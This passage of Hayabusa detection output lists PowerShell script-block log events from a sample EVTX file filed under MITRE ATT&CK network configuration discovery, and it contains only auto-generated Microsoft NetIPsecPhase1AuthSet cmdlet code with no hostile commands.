$__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase1AuthSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetIPsecPhase1AuthSet' function Remove-NetIPsecPhase1AuthSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.942 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleMMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeRule') -and (@('ByAssociatedNetIPsecMainModeRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeRule}, 'MSFT_NetMainModeRuleMMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase1AuthSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Remove-NetIPsecPhase1AuthSet' function Rename-NetIPsecPhase1AuthSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', Pos",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.942 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"itionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName', Mandatory=$true)] [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [Parameter(ParameterSetName='ByQuery', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true)] [Parameter(ParameterSetName='GetAll', Mandatory=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true)] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleMMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeRule') -and (@('ByAssociatedNetIPsecMainModeRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeRule}, 'MSFT_NetMainModeRuleMMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParam",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.942 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"eter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('Rename', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase1AuthSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Rename-NetIPsecPhase1AuthSet' function Copy-NetIPsecPhase1AuthSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewPolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewGPOSession}, [Parameter(ParameterSetName='ByName')] 